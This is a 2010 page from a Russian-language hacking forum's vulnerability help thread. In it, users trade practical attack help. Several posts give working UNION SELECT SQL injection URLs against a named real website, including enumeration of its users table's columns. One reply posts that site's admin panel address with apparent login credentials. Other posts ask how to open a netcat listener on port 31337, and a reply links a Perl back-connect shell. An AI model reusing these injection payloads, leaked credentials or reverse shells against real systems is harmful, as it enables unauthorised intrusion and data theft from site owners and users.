HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1426 из 2422 « Первая < 426926132613761416 1422 1423 1424 1425 1426 1427 1428 1429 1430 1436147615261926 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.07.2010, 18:42
IceJOKER
Новичок
Регистрация: 19.03.2010
Сообщений: 0
Провел на форуме:
11978

Репутация: 0
По умолчанию
Нашел SQL inj, но никак не смог вытащит что-то. Кто поможет? Читал темы тут, но никак не смог. В ГЕТ параметре не фильтруется ид.

Еще, нашел на несколькиx сайтаx раскрытие путей, а что можно сними сделать?

И как найти php inclue ?

Подробно объясните,please...
 
Ответить с цитированием

  #2  
Старый 31.07.2010, 19:01
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию
Цитата:
Сообщение от IceJOKER  
Нашел SQL inj, но никак не смог вытащит что-то. Кто поможет? Читал темы тут, но никак не смог. В ГЕТ параметре не фильтруется ид.
Еще, нашел на несколькиx сайтаx раскрытие путей, а что можно сними сделать?
И как найти php inclue ?
Подробно объясните,please...
тынц
 
Ответить с цитированием

  #3  
Старый 31.07.2010, 19:39
IceJOKER
Новичок
Регистрация: 19.03.2010
Сообщений: 0
Провел на форуме:
11978

Репутация: 0
По умолчанию
ТЫНЦ не помогло, вот сайт где скул inj. http://dag-auto.ru/userauto.php?PHPSESSID=LALALA&start=1blabla
 
Ответить с цитированием

  #4  
Старый 31.07.2010, 22:33
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию
Пытаюсь на сервере прослушать порт netcat'ом, но ничё не получается оО... выдает:

Код:
> nc -l -p 31337
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
	  [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
	  [-x proxy_address[:port]] [hostname] [port[s]]
Хотя я и могу запустить бинд на перле, но хочу понять как это сделать netcat'ом.
 
Ответить с цитированием

  #5  
Старый 31.07.2010, 22:58
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию
Еще вопрос:

Соединяюсь с сервером чз netcat, потом ввожу команду ssh 123.123.123.123, в ответ приходит следующая надпись

Код:
Pseudo-terminal will not be allocated because stdin is not a terminal
Что есть этот самый терминал..? где можно почитать про это?
 
Ответить с цитированием

  #6  
Старый 01.08.2010, 11:36
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
По умолчанию
Цитата:
Сообщение от IMMORTAL_S  
Еще вопрос:
Соединяюсь с сервером чз netcat, потом ввожу команду ssh 123.123.123.123, в ответ приходит следующая надпись
Код:
Pseudo-terminal will not be allocated because stdin is not a terminal
Что есть этот самый
терминал
..? где можно почитать про это?
Это означает, что тебе нужен бекконект который привязывется к терминалу. Вот держи залил тебе на перле http://www.sendspace.com/file/tsb30y
 
Ответить с цитированием

  #7  
Старый 01.08.2010, 15:54
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию
Как им правильно пользоваться?

Выдает:

Код:
ERROR: No more pty's avaliable
P.S. Может у кого есть ttyX, что-то нигде не нашел.
 
Ответить с цитированием

  #8  
Старый 01.08.2010, 21:14
Electr0n
Познающий
Регистрация: 19.08.2009
Сообщений: 68
Провел на форуме:
2159875

Репутация: 446
По умолчанию
информация о табицах не доступна...

возможен просмотр?

Код:
http://www.drummersworld.com/dsp/category.php?id=e90a535886a467144e56b47de5e563b3&catname=Cymbals&catid=-147+union+select+1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15,16,17,18,19,20,21,22--
 
Ответить с цитированием

  #9  
Старый 01.08.2010, 21:27
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596

Репутация: 88
По умолчанию
Electr0n там видимо фильтр на выуживание таблиц, потому что если методом подбора подобрать допустим таблицу users, то поля можно свободно получить, без брута

Вот тебе админка:

http://www.drummersworld.com/dsp/admin/admin.php

technology

fuckwhohackthisshop
 
Ответить с цитированием

  #10  
Старый 01.08.2010, 21:29
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию
http://www.drummersworld.com/dsp/category.php?id=e90a535886a467144e56b47de5e563b3&c atname=Cymbals&catid=-147+union+select+1,2,3,4,5,6,7,8,9,10,column_name, 12,13,14,15,16,17,18,19,20,21,22+from+information_ schema.columns+where+table_name=0x7573657273+--+
 
Ответить с цитированием
Ответ
Страница 1426 из 2422 « Первая < 426926132613761416 1422 1423 1424 1425 1426 1427 1428 1429 1430 1436147615261926 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.